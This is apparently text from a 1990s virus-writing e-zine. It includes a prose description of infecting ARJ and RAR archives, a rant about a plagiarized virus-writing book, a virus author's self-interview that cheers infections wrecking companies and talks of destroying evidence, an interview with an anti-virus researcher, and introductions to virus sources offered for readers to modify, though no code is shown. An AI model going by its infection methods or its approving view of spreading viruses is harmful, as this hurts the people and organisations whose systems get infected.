Else it goes to infection. At second it finds the first ARJ for infection. If it finds some then it tries to infect it. If the archive is infected now it is looking for the next ARJ. If it does not find any ARJ for infection it tries to infect RAR files. RAR file can't be MULTIVOLUME (at next release it can be.), can't be LOCKED and in archive can't be present AUTHENTICITY information. RAR infection is very simple. Go to eof, write header, write yourself and infection is done.

Download code and examples here

So I wish you many happy days and connection reset only by beer and never by peer.

Blesk.

My greetings to :

all co-authors of this zine >>> see ya at next release
#v >>> I will be back soon
Qark >>> Thanks for ARJDrop in VLAD
Dalmatin101 >>> I miss you.
Ilo >>> Thanx for keys from LAB.
Pedro >>> You bastard, get in touch !!!!

PS: Do you know how to call the worst mutation of AIDS [eic]. I think what Gates [geits] and W95

PS2: To view present.com you must have a math coprocessor.

[ The stuff above is original Blesk's, as we received it. English is lousy but Blesky is improving every day...]


If you are a puritan or do not like four letter words, you are asked in your own interest to skip this article. It may contain examples of bad language and lewdness etc ...

Editor

As I bought in my favourite book store a book titled "Modern computer viruses - basics, prevention, protection" I was really pleased. But this feeling didn't last more than a few hours. As I read each further page, I got such a strange feeling. As if I had read a substantial part of the book already elsewhere.

This Czech book, titled "Moderni pocitacove viry ....", written by Josef Jaluvka, is divided into two parts. The first part is the usual crap like what a virus is and what it does, defines types of viruses etc... The second part, in my humble opinion, is the crucial part of this book. It is a quite detailed guide to writing viruses. But ... I mentioned before my strange feeling about this book. And this second part has brought the proof.

About 50 % of this book is ripped from various zines, mostly from VLAD's, 40hexes, NuKe Journals, but also from serious hardcopy publications which are copyright protected. But this author, son of a bitch, gives not one fucking credit for stealing the text, schemes and sources. Asshole! Cock sucking motherfucker! Fucking lamer! DIE !!!!!!!!!

As I told it to some people whose work was stolen, they were really angry. Just one example for all ...

One former member of the vx underground, now retired, was really angry. I was asked not to publish his name and his opinion. But just to illustrate his pleasure, I put here anonymously some of his opinionz.

... and im not surprised...these books are all shit anyway

all your tutes 're included. But that dick didn't put one single credit in that book

... no shit! what a jerk

... goddamn fucker. good thing those tutes aren't so great anyway :)

In some other place in the book that 'author' is really without any shame. He just ripped a series of articles originally published in the elite hardcopy Slovak magazine PC Revue. Even the schemes are the same ...


I guess, if the true author of that part of the book 'll read this (and I know he 'll because he is an AV sucker working for some company producingr avir iCî), he 'll prosecute that lamer Jaluvka for copyright violation. I hope he 'll request at least 1,000,000 for that violation. So, I wish you to lose that case, Mr. Jaluvka ....

[ To the reputable unnamed dude .... I can contact you with a really kick-the-ass lawyer. Just mail me to our e-mail address at hotmail. ]

Just to illustrate some of the really valuable information in the book, imagine this. On page 202, chapter 5.1 "Pasivni obrana" - Passive protection, Jaluvka describes how the authorz 're trying to make it harder for AVerz. One of these counter-measures should be code optimization. And he gives some excellent xsamplez in a table.

In book two, chapter one, Jaluvka describes some toolz necessary to fight (and write) computer viruses. He describez Techhelp! 4.0, some deep-inside-DOS books, Sourcer, AFD Pro, Turbo Debugger, Qaid analyser and ... that's all folks :) He has no idea that some Ralph Brown's Interrupt list exists (every good FTP site or BBS has it), that some Soft-Ice debugger is on the nearest warez site, and ofcos, that there is a shitload of virus zines. But maybe this omission is just on purpose?

Although the book contains a couple of useless crap and some really screwing mistakes, it could be used as a quite good tute to code viruses. But I think that is not the thingy the author wanted.

But people, if you are publishing some stuff, do not forget to include that funny C in brackets. Just by putting (C)opyright 1997 by your_name_here you should be protected. And of cos, in case of copyright violation you can prosecute the bastard.

This article is (C)opyright, (c)opyleft 1997 by The Ziggy Zag and was written just and only for the bombastic issue #1 of the *-zine.


An Immortal Riot/Genesis original (c) 1997 The Unforgiven. May freely be quoted!

Index of this article (click sensitive):

Introduction
Things to do before physics
Red Hot Chili Faces
The early Insane Reality - Insanity or Reality?
Current life & general adult hints
Satisfying one's ego
AV-Interview
IRL-Papers
The horror!
Gimme more cheese please
Eugene K
Side-effects the conversation way
Scene-Zines
Greets
Credits
Goodbye's and cya somewhere.. somehow.
Quotations & Poetry
Future

Introduction

Mgl (Mengele.(P)hD?) told me SVL was about to release a newsletter, and asked me kindly to contribute a little something to it. He had nothing in mind what I do for them (I said no to source-code contributions since I didn't feel like decreasing the code quality) so I just had to think about something myself. Well, this is the result, perhaps nothing really worth wasting any time with, you decide. My nature is to please anyone whenever I can so don't hold me responsible for you losing your faith in humanity, society, god or whatever. If someone wants me to write just something, surely I'll do it. If he would've asked if I could give him a blow-job, I would though have turned down the request.

This contribution from me is styled VLAD-AF article.2_5 because I find the scene way too serious and that article a good read (Yay. I wrote it ;)). This means this can be seen as an early valentine issue from myself included in the SVL-e-zine #1. Or it might just be seen as wasted bytes dedicated to wasted souls.

Notice that the rest of Immortal Riot/Genesis has nothing to do with this stuff at all. I assume personal contributions are allowed to other zines, specially since MGL contributed to IRG#8. Also important to mention is that none of this stuff (I guess) would make it into an IRG-zine due to our new technical styled magazines which I hope you all did enjoy!

So... This is from all of me, to all of you - whoever you are. My dog surely will like it, but an updated interview with him won't follow! Pardon me.

Deadly serious ironic/sarcasm-ish reading and happy '97!

- The Unforgiven

Things to do before physics

Before I continue writing I'd like to take the opportunity to mention a few things that perhaps could ease my burden.

1). Time to spill out the beans... But who wants to eat them anyways? I'm as for the moment writing & doing research on an article about "why viruses are written, for who they're aimed, why viruswriters keep on doing them, personal motivation for viruswriting, why you once started and what you find fascinating (or at least interesting) with them." So, I'd like *every* writer of computer-viruses to email me and write a little something about the above mentioned questions. If you feel like adding a few things that you find interesting go ahead, let your mind go wild!

You can be anonymous if you like but don't forget to mention that! This article will hopefully (most likely) be included in our next issue of Insane Reality - IRG#9.

My email addresses are: [email protected]@[email protected]

Notice also that those systems are rather unstable, but if you read (II) you know I also can be reached on that address ( (II) is 9 lines below this line ).

2). Part II - Where you rather not want your daughter to be late at nights... On http://www.algonet.se/~robry there are some IR & IRG files located (ir.html is the file located on that address btw, if that is for any use).

It's not an official IRG page but all of IRG.SE know the homepage operator and he kindly borrowed us some HD space. Every swedish IRG member can also be reached on that address - just mail [email protected] and he will kindly CC (that is abbreviation for _carbon-copy_ if my memory isn't totally phucked) them to the correct person. Notice though that the official IRG-page still is located on:

http://www.geocities.com/SiliconValley/Park/9595


3). I'm just an inspiration for birth-control... My submission (other word for contribution Quantum told me ;)) to VLAD-AF (Vlad-April Fool's Edition) called "IR#8" contained a little challenge - namely to crack "File Encryptor". Well, Sepultura found out the 12 byte long key which was "[email protected]" (w/o the quote-marks).

The april fool joke from me was that secret.txt never did give out my real information nor did it contain the reasons why my handle was The Unforgiven. For those who wonder.. keep on wondering! I doubt that it has something to do with suicide though, which some brave writer believed.

Also notice that Quantum never did hack immortal.se (since it doesn't exist), and ripped "IR8" from there; it was a submission to their zine from me, pretty much like this is ;). He wrote that information at the end of the article. Well as I figured you never did read the entire faked Insane Reality #8 ;) and believed him. April sucka. I hope you reach the end of this one :).

Red Hot Chili Faces

Hmm, I don't quite know where to start, but I would like to comment a few personal things at this entry.

There are a few good reasons why I didn't contribute much to IRG#8 and beside being very busy with life, university, my gf and the general irl-stuff I re-read the IR-zines and felt terribly embarrassed for them and felt like writing no more. For example, I started to write an article called "What good side-effects viruswriting can result in", but gave it up. It became too personal, abstract and complex. And beside this, it turned huge. A short summary of my results might still be included here or elsewhere since it's a rather interesting topic. So stay tuned.

The early Insane Reality - Insanity or Reality?

Well, both really. They're insane, yet real. I was red-phucked-up in my face and my heart went ape while reading some articles, specially those which included stuff written about girls and politics. And yea.. those viruses too. *Sigh*.

Also worth mentioning, I wasn't too proud to see some text-strings included in my viruses or in programs included as hex-script in some zines. (One example is "lord0.com" in IR#7 (reality.010 among with basically the entire adventure of porno)). For those who've been harassed, I'm sorry.

Hrm, about some articles... Really, who's interested in reading about some Maria, some Ellinor, some Anette or some other girl? Who's really interested in reading about a confused teenager's opinions about something that he cannot express properly in english? Who really bothers about a person who rambles on and on and on (like now) without giving any information, just pure junk? A real rnd_garbage generator, or so? However, for those who really are interested in me and my life, junk stuff, etc., paradoxically enough I won't let you down, but this time write about something that I can be proud of and still will be proud of when I read it in let's say 3 years. However, it's still junk though. Do I never just give up?

Current life & general hints, advises and shit

Current life is cool. I study and spend most of my spare time with my close friends or with my gf (name won't be mentioned) who I've been together with about half a year (so far).

A hint in life is to have plenty of sex. If you consider yourself too busy or "too of something else.. " change opinions. Nothing is as relaxing as it. It's though not good to become a "sex-addict", since most addictive things are bad for you, sex being the exception as long as you have semi-control over it (having sex with yourself w/masturbating 5 times a day isn't the way to go). Not only is sex great but to really care about someone rocks. Don't let your life miss this.

If you smoke just give it up. It smells bad and it won't do any good for you. Smoking at parties is alright but it doesn't really impress on most ladies. Socially smoking is great, but socially being decently drunk is also a killer, so.... it isn't perhaps the best way to deal with things'n'shit anyways.

Alcohol. ch3-ch2-oh. This rocks. Don't be sober too damn often. Home made wine can rock (and beside it's cheap, it's a good hobby...).

Astronomy. Really interesting and is a great thing to discuss, philosophise and crap on about after a few beers. Only a few things can be described as complex or simply as this.

Driving-license. Freedom costs. But damnit, it's worth it.

Cooking. Everyone likes to eat, be sure you can do magic in the kitchen. Don't rely upon girls to do this for you. Not being dependent on other persons is essential in life. I only wish I could describe my situation as "not being.. ". Bah, isn't money the key to everything? (yes, that might as well include the r@@t of evil, too)


One Half. A really good virus, lacks bugs and contains a really cruel original payload. This issue includes the original source code.

Suede - Coming Up. A really cool album, maybe the best album any U.K band ever produced. Sgt. Pepper from Beatles might just be up there.

Ford Fairlaine. "Eih.. I fucked him!". Great fucking movie if you ask me. Up there along with Eddie Murphy's RAW.

Hotmail. Well, any anonymous mail-system is great if you feel like giving your teacher some sort of feedback (criticism can be kind of sensitive, just trust me..). http://www.hotmail.com. A cool rerouter can be found on http://www.starmail.com ([email protected] is one of those catchy phrases..).

Burger King. Just so much better than fucking McDonald's. Not a good place to work on I guess but for lunch (not date-dinner though!), it's more than OK.

AVP anti-virus. Love the demo-section. The scanning/cleaning capabilities are also really impressive. Along with its code-analyser. If only it would run a little bit faster on my machine.

Java, html and high level languages. Well, assembler is cool, but I sincerely doubt it will get you any wealthy. Internet and its applications is what brings you money. Developing things fast is what companies want you to do.

Irc. If used properly (i.e. not sitting there wasting all your spare time) irc can be as good as a shrink depending on which people you have a conversation with.

Money. I have stated that greed is your worst enemy, so watch out. Money tends to change things, beware so it won't mess you up. Might just solve your problems better than booze. Booze solves things by its nature ;), problems are not included though.

Drugs. If you're afraid to face the reality, change your situation, don't flee from it with drugs, computers, irc and shit like that. If you can control your use, it will sooner or later turn into abuse and you should give it up asap.

Clifton Classic clothes. A sleep-over, black jeans (or ordinary Docker's if you prefer that) combined with Sweet Georgia Brown hair pomade looks nothing but great.

Insane Reality. For whoever finds low-level assembly programming and virus-related things interesting this is the zine to get ;). Hehe, just had to mention this.

love. If you don't find someone else to love that loves you back, be sure to love yourself. It's great to have a massive, yet humble ego.

Studies. Can be quite hard. Compared to life and work it's though not as hard as you once believed.

Isaac Asimov. Truly a smart writer. The books about the "Foundation" and "robots" are good and cleverly written. Something useful to waste your time with and might just get you interested in astronomy.

Acqua Di Gio Giorgio Armani. Going around stinking bloody Farenheit or some other highly common eau de toilette or after shave always manages to upset someone. Be original and expensive in your choice of scent.

Coffee. Keeps you awake during studies, during hacking, during coding. Sleeping is such a waste of time, really.

Oxygen. Can't really do without it, however some early viruses early in the world's timeline could.

Overrated things

Hitchhiker's guide to Galaxy. Isn't all that great, really. Has a few points, but not worth 900 pages.


Windows/95. Everyone knows this OS sucks, how come everyone is using it?

Swedish chicks. They aren't all that neat. The majority is just plain trash, most of the rest is average. A minority is something to have in the long run. Of course, one doesn't realise this on a 1-2 week long vacation.

Sleeping. Everyone likes this and it's essential, it's said. But, really, it is like wasting 1/3 of your life.

Opinions. Who will listen to you anyways? Who needs goddamn opinions? Why are you even reading mine?

Technology. Science should be fiction/not truth, dreams/not reality and so on.

Neuromancer. Another book not worthy its reputation. William Gibson just ain't no good author.

Action movies. Do I have to comment this?

Satisfying one's ego

Here's an interview I filled out for Richard Loearker's book. It will be an anti-virus research book and I do encourage every viruswriter to erase my answers, fill in your answers yourself and send it to [email protected]. If you want to add more questions to it, that is fine, too.

I know this is lame, egoistic to include an interview with yourself, but this ain't no popularity contest. Do me your worst. Personally, everything I've ever written is horrible; this piece (i.e. the interview) I see as the exception, but that might just change if I re-read it in a year. Well.. most things tend to change.

What is your handle?

My handle is The Unforgiven.


How did you get your handle?

I found the handle on one of Metallica's albums and decided to take it. I liked the song and the alias did somewhat fit my person. I don't know exactly why, but metal-music has in a way or two always inspired viruswriters so it seemed to be a natural handle to occupy.

How old/young are you? (Approx. If you won't want to be specific)

I'm 21 years old.

Would you dare to give me your first real name? (Do if you want to, don't if you don't want to)

Sure, that would be no problem ;-).

How would you describe yourself?

I prefer not to since your readers would probably think of me as some sort of bragger. Ah well, I think I'm a pretty ordinary young adult who is a part-time enjoyer of life.

As for the moment I'm studying at Chalmers University of Technology located in Gothenburg (Sweden), and will hopefully be for quite some time. I've worked with various things during the previous year, among many things computer-security. Although I liked my job I decided to get back to school after a moment of clarity.

Socially I'm really not very complicated. I live a healthy social life with really good friends and with my girlfriend who's always there for me. I believe I'm very spoiled concerning this kind of things.

How do your friends and people around see you like? (BE HONEST! ;-)

I am not a mindreader, but I do however believe that most people have little or no trouble with my humble person. Of course, there are always exceptions and honestly I don't deserve to be liked by everyone. Hopefully all that is in the past, but who knows? Cruelness is one mean habit to kick. It just won't walk away all that easy.

I always try to care for persons who care for me and I'm always interested in getting to know new persons. Maybe those are the reasons why people accept me for who I am.

Since when did you get involved with virus writing and how did you become interested in the first place?

I became interested in viruswriting somewhere back in 1993. Me and a friend started Immortal Riot - mainly a viruswriting group, and I had to start to learn assembly.

Since when did you get involved in a virus authoring group?

When I started the group, of course.

What made you decide to join this group?

I didn't join Immortal Riot, I created it. I don't though know exactly why I formed yet another viruswriting group, but it seemed like great fun and I tried it out.

How did this group get its name?

I don't have a clue. It did sound cool.


What are the reasons for you writing viruses?

I'm totally clueless! There aren't many good reasons really, but viruses fascinated me and I wanted to learn more about them. The best way to learn more about viruses is to write them and so I did.

What is the main purpose of the group?

To write new good undetectable viruses, supply the masses with virus related information and knowledge for whoever it may concern.

One of our goals in the beginning was to learn the shit ourselves and teach each other the knowledge achieved. Ah well, mainly the purpose of a viruswriting group is individual. I doubt we had any specific purpose really, mainly it was just a fun thing to waste your time with.

Approximately, how many viruses have you written?

I couldn't count all updates, new versions and so forth. The viruses released in the wild and which have infected computers around the globe might be around 30.

Which viruses were a real challenge for you? (Masterpiece?)

When I finally got the knowledge to write some good virus I got unmotivated and grew bored with it. Mainly I wrote viruses whenever I felt like tormenting some computer geeks or when I was really upset about something. Nowadays, I've calmed down or maybe I just got better things to do with my life? Who knows, I might give it another shot, sometime.

Have you written any virus toolkit or add-on?

No, I don't think so.

Why have you written this toolkit or add-on?

..

What kind of reactions did that program get?

..

What's your attitude towards antivirus researchers and why?

I've no problem with most of the guys "on the other side" and most of them do deserve some respect. Some of them have though some serious attitude problems with viruswriters, but honestly I couldn't care less about them. Some persons have problems with everything and this just ain't my burden.

Give me some opinions about and his product. If possible, motivate.

... Frans Veldman (Thunderbyte Scan)

Frans Veldman is a really good low-level programmer and TBAV is a technically excellent product.

... Dr. Alan Solomon (Dr. Solomons Antivirus Toolkit)

I believe Dr. Solly has a huge identity crisis or just heaps of problems with his very own person. I haven't looked closely into his product, but he ain't programming on it himself so it can be good.

... Fridrik Skulason (F-Prot)

I like Frisk a lot! His product is excellent and I recommend F-Prot for everyone who is looking for an anti-virus program. Fridrik himself is a very nice person and he's also a lot like "us" but older. He once stated in an email to me saying "viruswriters are a lot like me 15 years ago,", I like him for being honest.

Also notice the comma in the quote before the quotation mark ends. Well, let's just say I'm trying to act as a reporter.

... Eugene Kaspersky (AVP)

AVP is a good product, too. I don't know very much about Eugene but I want to believe he's nice.

... others you would like to give your opinion about? (ME? Naaahh)

Nah, I wouldn't waste my time to write anything about John McAfee since everyone knows his product (Scan) sucks bigtime and he's a fake.

What is the best line of defence against computerviruses and how would you implement it?

To remove all floppy and harddrives and never copy anything? :-). Honestly I don't quite know. No system is 100% safe against virus attacks.

Personally I like resident monitors and recommend other persons to use them if they're afraid to get a virus (I believe the TSR monitor called F-Prot Gatekeeper is a good choice). Some sort of scanning software is also good to execute once in a while..

Would you like to work for an antivirus company as researcher/troubleshooter? Why or why not?

I would have no problems with that. Would be quite ironic and I couldn't say I wouldn't like it before I had tried it out.

If someone turns to you for help when his computer has a virus, would you help him? Please motivate why or why not.

Sure I would. That would perhaps increase my knowledge about these little things and at the same time I would get the other person's respect. I've done this several times during the past years.

Would you ask money for your help?

Of course not. I dislike greed.

If it turns out to be a virus you have written, what would you do?

This too has happened :-). I gave out all technical details about the virus (trust me, they got really impressed) and wrote a cleaner for it. Voila! Respect earned in a cheap way!

Would you still ask money for your help?

I wouldn't in the first case, so... No, I wouldn't. But I would offer them the source code (claimed disasm :)) for further investigations.

What would your initial response be if you see a newspaper that describes your virus wreaking havoc in:

A government agency?

First I would laugh my underpants off, but then I would be a little bit worried about it. My handle/real identity is pretty known afterall so this could get me busted. I think I would destroy all evidence so they couldn't prove shits.

A hospital?

That depends. I wouldn't like to see someone getting hurt physically by a virus of mine but if it just had infected some of their computers or trashed some easy to recover data I'd have no worries with it. Of course this is bad publicity, but I can live with that.

A large company?

Yummie! I like all daily newspaper reports concerning companies getting hit or (preferred) wiped out by a virus of mine. I would be happy a day or two then I would forget all about it.

A small company?

I couldn't care to discriminate between large or small company. Of course I would like this too.

What would your initial response be if this company went broke due to your virus?

I would silently say "Woops, better not trust computers, geek." and get paranoid about the consequences. Surely, they would want someone hanged.

What would your initial response be if someone dies in the hospital due to your virus?

Shit! Really I wouldn't like this to happen. I'm not a weirdo. I would probably think about this a lot and after quite some time come to the conclusion that it was all an accident and not - not even indirectly - my fault. Then I would try to forget all about it and blame the dead vegetable on someone else.

What would your initial response be if the government loses all police arrest records due to your virus?

Voila! This I would indeed like. But then again, they wouldn't report this and just restore the records from backups. If they had no backup I would think twice about the effects this kind of incident may bring and get really paranoid.

How is the law in your country concerning computer viruses and what is your opinion about it.

The law is a complete mess. I can understand if deliberate spreading of computer viruses is considered a crime in some countries, but writing? No way! And how easy is it to prove that I deliberately did spread a virus? Most laws about viruswriting have a large amount of flaws. Surely, with a good lawyer you will get away with it. Sweden hasn't for the moment any specific law which forbids this.


Have you ever been arrested for doing illegal things with computer (viruses, phreaking, hacking)?

No. I have never been arrested for anything. Aren't I too legal? :-).

Has this arrest altered your view of these activities, and, if so, please describe the stage you went through.

..

Would or do you write antivirus software?

No I wouldn't. I couldn't make money outta it anyways and just writing one for fun is a waste with my ever decreasing amount of spare time.

I have though written cleaners against viruses reported in the wild. It's of no use to have a product detecting 10.000 viruses which aren't a real threat.

If so, what kind of software has your main interest?

TSR-blockers, scanners & cleaners.

What would you like to say to antivirus persons if you have the chance?

"Hello". Which is a good first word to start a conversation with.

What would you like to say to new virus writers that are getting in the scene?

It's not really worth it and maybe it's only a waste of time for everyone. In the end nothing of what you are doing now counts. Find something better to do and get on with your life without the scene. It won't do shit for you.

What are you planning to do in the future with the knowledge you have now about viruses?

Frankly said I don't quite know. I had use for the knowledge gained from the scene and from friends in the scene. However I would like to believe that you have use for anything you ever learn, so it's not really such a big deal afterall.

I'm as for the moment writing an article about what good side-effects viruswriting may have (on a personal basis), but as for anything concerning the future, you just don't know.

Do you think that writing viruses was a good decision for you to take? Please motivate why Yes or No.

I wouldn't know. I couldn't possibly know what would or could have happened if I didn't. I only know my situation as for now, but sure I like my current life.

PS: This interview will be put in a dutch antivirus book.

AV interview


Here comes an interview with Sarah Gordon (you all surely know her). She can be reached at [email protected]. Here it follows anyways, enjoy!

First of all, i would like you to give me a personal character presentation about yourself with your own words. then, secondly, (be honest), i would like you to write how you think other people around you see you as.

Personally, i try just to be honest, thorough, compassionate, and loving person. i try to not make judgements or draw conclusions without thinking them through, and i try to be fair. (note: i did not say i dont make judgements or draw conclusions. i said i try to think them thru and be fair. i see nothing wrong with a person saying 'i like or dont like this or that and here is why', or 'this or that is wrong, here is why'. i am not very good 'game player', and usually just say what i think. since sometimes what i think may change, this can be a problem :)

my priorities in my personal life are relationship to God, to my husband (i was recently married as you may know), to my children (who are grown), to my friends, and then to my work. at least, in theory this is the case. how i see myself?..hmm, well, i try to adhere to what i think is important, but i do not always succeed.

how others see me, well, you would have to ask them :). but i think sometimes some people have pre-conceived ideas, or want someone to fit a certain mold they are comfortable with....so they put me there. when they do actually take the time to know me, they often find out they were wrong. i think also this happens with many people, not just me. (it could be they find out they were right :)

yet others, usually those who are professionally competent and secure, don't have these problems -- they see the bigger picture and have no need to create artificial life-model of another person :) (no pun intended).

i am told that i have no sense of humour and that i see things 'differently', whether or not this is a benefit is an exercise left to the reader.

about your articles, what gives you motivation to write them?

well, i write different kinds of articles, and the motivation is different for different ones, at different times.

i write about something if it interests me, and if i think i may have some idea someone else may not have thought of. or if i see something written i dont agree with.

i have written several for money, but they are usually technical security articles, nothing to do with viruses or virus writers, or any of that. sometimes it is nice to deal with 'non-people' issues, there is a lot less room for 'controversy' :)

and/or the virus-community with your write-ups? (if yes, motivate what.. ).

sure, some have changed. i mean, now they are talking to each other instead of just name calling. i think i played some role in that. well, i know i played some role in that. but my 'role' was just to initiate change, as some form of catalyst. don't you know, usually the catalyst gets burned the most :)

there is now more examination of facts, instead of hype and hysteria, related to virus writers. i know i played some role in that. all in all this examination is good, for both sides of the discussion.

i think virus writers are now thinking and talking more about what they are doing and want to do, and realising the impacts of releasing their creations. im told i have had some role in that. but i dont know. i hope i did. but it could be natural sequence of events. maybe i just recorded/documented it. maybe i made some change by doing that...i don't know. i know personally i have had some impact in the overall dynamic, but how much and how to measure is difficult.

many times now im quoted about what ive learned by just talking to people and analysing facts about how viruses really spread. hopefully this has some effect on getting the media to focus on real problems.

but virus writers and things related to them are just small portion of my work. ive done more in product testing, certification and network security. however, it is the 'virus writer' work which seems to grab some attention.

something you have written/worked about that has been misunderstood?

sure, this is always the case with everyone isnt it? havent you? :)

in particular, i remember when phrack wrote some story which they later said 'we're sorry, we didnt check this out thoroughly' about my trying to shut down some bbs. its true i was in a room when someone suggested that some bbs should be closed, but if i remember correctly, i suggested this is not a very good idea...

then, there was that ugly silliness the virus writer kohntark made up. i never did figure out why he did that, but he seemed to have some stuff works, just like it is cool to know about other computer actions and who can argue with you? not me. but there is no 'magic' or technological 'excellence' in this stuff. its not 'new science'. its not any way to get a good job. what it can be is some very costly pasttime. there can be a big price to pay -- you can really hurt someone with the viruses, because you can not guarantee that you can control the viruses.

people will say you cant *really* hurt anyone, but they are wrong. so please stop and think what you are doing. if you are the kind of guy who wants to hurt them, then you deserve what you may get if you do it.

[how many words was that?]

about your article "the generic viruswriter", the four persons you selected for the four groups, who were they? (if you can't give this out, don't, but motivate why.. ).

sorry but that is confidential to them. why? i told them it will be confidential unless they tell me otherwise when i asked for people to respond to the survey.

which virus-related article is your personal favorite? (why is that..).

general systems theoretical model for av protection (if you mean my own). it is favorite because it allowed me to work in new area. or do you mean in general?

what, concerning virus-related stuff have you regretted in your life?


i regret that i did not realise the personal dynamics of my relationship with the virus writer formerly known as dark avenger, and that i was sometimes too concerned with my personal life to give attention to him when he needed it. but it was really wearing me out, and i actually got physically ill from spending too much time with all the work. i did not realise the impact this all would have on him, or on me. it took a lot of my time and attention for several years.

i have written a lot about how we dont realise the impact of our actions on others, since the computers can tend to desensitize us. unfortunately, i was not 'immune' to this.

do you prefer tea or coffee in the morning?

grape kool-aid (dont you attend defcon? :)

your favorite dish?

prawn crackers, any hot chinese dish with chicken.

what're your hobbies? (umm.. one hobby.. many hobbies??).

hobbies? i think you need spare time to have those.. i used to sail and did at one time train and ride my own horse, but i had to give him away when i could not afford to keep him. i also dont have my sunfish sailboat anymore. i have recently tried to do some oil painting, but lost interest in it. i guess i dont really have any hobbies.

do you?

who did you vote for in the president election - 96?

i did not vote.

do you think the "virus-infections-problems" will die out and fade away with the OSes getting more common, dos losing ground, etc? and if yes, how long will it take..

i think this depends on how you define 'problems' :)

you sell f-prot professional, what other av-products would you recommend for the average user?

the 'best' product for any job depends on the needs of the user as well as the product. any product which is wildlist compliant is a good 'starting place' for the user. from there, he will need to factor in his individual needs.

about f-prot pro & the non-registered one, what are the differences?

i did a comparison for the Command web site...you can see the differences there! (can you tell i'm getting tired? :)

what does your typical monday-friday day look like? (are you satisfied with your current life?).

get up. drink kool-aid. (ok, coffee:). log-on while drinking coffee. answer mail. answer questions about viruses :). answer more questions about viruses :). (answer this mail). look at viruses :). look at more viruses :). try to spend some time researching new topics. answer more questions about and look at more viruses (usually macro viruses).

am i satisfied? no. are you?

what plans (irl/computer) do you have for the future?

irl, i want to buy a house and a dog :) have a garden and volunteer some time someplace meaningful.

for computer, i am thinking maybe i'll write some new software, maybe automate some tests which take a lot of my time now, and probably design a new CSecurity model.

do you prefer a dog or a cat? (not for dinner.. pet :)).

hey, how did you guess? i have a cat but he lives with my friend. i could not bring him to florida. he loved his house too much. so now i don't have any pet. but hope to have both.

well .. since i wrote this, i have bought another dog, he is not yet named, and is still at the pet store .. but i will be bringing him home soon.

[since i wrote this (yet another edit :)), the dog from the pet store got sick. so we got yet another dog. our third. this one we named 'lucky'. i hope he is :)]

about viruswriting groups, a lot of them have faded out and died recently, anything you want to say to them or to the ones that still remain?

i'd be interested to talk to anyone who wants to talk seriously about viruses.

do you consider viruswriting to be a perverted hobby?

never did. waste of time. probably unethical from a formalised ethical modeling point of view (if you're Kantian :). can be illegal. but perverted? that's funny :). have you seen the Internet lately?

let's keep things in perspective. i work hard to help users avoid problems from viruses, and feel people need to take active steps to help stop virus distribution. i'm against indiscriminate virus distribution, and think that as a society we should not overtly or tacitly condone it.

but there are far worse problems facing our society. this is not to say viruses are 'no problem'. they sure are! but in the 'big picture' there are far worse problems facing computer users and society in general than the viruses we are seeing today.

it is the viruses which i have chosen to fight, and i won't stop fighting against them because it is wrong to make software which hurts people or which has the potential to hurt people. computers should be used for helping people, used for good ethical purposes. now, can you and i talk about why you write viruses and distribute them in your magazine? because i think it is wrong. you can argue that what people decide to do with them is their own business and not your fault, but actually if you didn't give them the viruses, you wouldn't have a role in their using them for bad.

as it stands now, you are partly responsible for what they do with your creation. why not create something which uses the computer to help people, something they can choose to use and thank you for instead?

IRL papers

I've seen a lot of write-ups concerning computer viruses lately, but since they're all in Swedish and me being a bad translator, I'm sorry I didn't translate them all for you. If you know some Swedish though, the page to be on is: http://www.qainfo.se/artiklar_om_virus.htm (or .html, dunno).

One article called "Virus Buster" is located at http://www.idg.se/cs/artiklar/1996/77/cspe/b10a/b10a.htm (or .html, dunno), which features a picture of Klas (S&S Sweden) Schöldström "who makes life hard for those who got the idea to create and distribute computer viruses" (He's definitely geeky looking, check for yourself!).

Some quotes from that article (published in Computer Sweden #77, Friday 6 December 1996) follow here (scene-person related, go bitch on him or so..).

"Last spring, the virus Boza came, that was the first virus for Win/95. But it sucked. It can only infectfiles in the same directory from where it was executed from and it fails doing it sometimes. It wasthough a media-hype (or PR-trick) from the virus-authors to be first with a 32-bits-virus".

(Now, he also disses the Hare virus, claiming it only halts the computer, and he considers macro viruses the real danger..).

Furthermore, they write (which could be interesting for this zine ;)):

"Klas consider a virus named One-Half to be among the most naughty one's he's ever seen. - At theoccations I've seen a virus spread itself to many computers at one time, it's one-half, he says. "It'smade hard to detect and has no bugs. It places itself on the "partition-sector" (direct-translation -tu) andslowly starts to encrypt the harddrive. When half of the hd is encrypted the message "Dis is one half.Press any key to continue" is displayed and at that time, also back-up's is encrypted.

(Klas starts his sector editor (which he wrote himself%!) and takes us on a journey through One Half and its functions.. w-o-w ;)).

(Now, he says we're all kids who seem to love computers, yet are trying to fuck them up and thereby really hate them..)

.SE top 10 wild list:

Junkie.1027 (boot/file)
Form.a (boot virus)
Antiexe (boot virus)
Beijing (boot virus)
AntiCMOS (boot virus)
Grangrave.1150 (file virus (Burglar/H, which I wrote an AV against btw! - tu :))
One-Half (boot/file)
WM.Concept (macro virus)
Empire Monkey (boot virus)
Ripper (boot virus)

Well.. In case you're interested!

Horror

Since I forgot to include this code in the VLAD April Fool's edition, here follows [Push-Up] (v. early beta!), written ages and ages ago by someone who surely will turn red-hot-chili-red when seeing this ;).

The code is as unoptimized as can be ;) and there are labels and checks without corresponding code :-). Double code inclusion is included for your own sake! You -should- be able to optimize this and feel like an asm-wiz!

As is shitty old tradition, we supply you with unfinished viruses for you to modify and claim as your very own creation!

Also, as we say in Sweden, "a laugh extends your life", so... I guess you'll be like really old after looking closely into this one.

Anyway, the basic idea for this virus was good, since I consider a bs/mbr/com/exe semi-stealth virus an alright replicator. The virus should work, but I guess that's about it; probably not perfectly under all configurations and stuff.

Gimme more cheese please

This virus is *really really* old and is for me hysterically funny to look at. If the author who wrote it in 93/1994 remembers it, please write me an email! (I hope/think/believe you don't mind it being included here ;)). It lacks some byte optimizing but the overall quality is alright concerning the coding style. (Now, I can nag on this; when I received it I didn't understand anything and the author teased me like shit ;)). Well, it's a resident COM infector without any other functions or payloads, works really well on my machine.

Eugene K

Well, I'm a big fan of AVP and its graphical section of viruses, so here follows a gfx payload which is a sort of "remake" of a fire effect. Finally Eugene did include (what he called) "Riot.ir8" (a virus with a gfx effect), and this is just to see if he will include the virus below too. The virus follows as a hex-script below this very slow effect named GrayNuclearSky. Don't enjoy.

The LifeWire virus

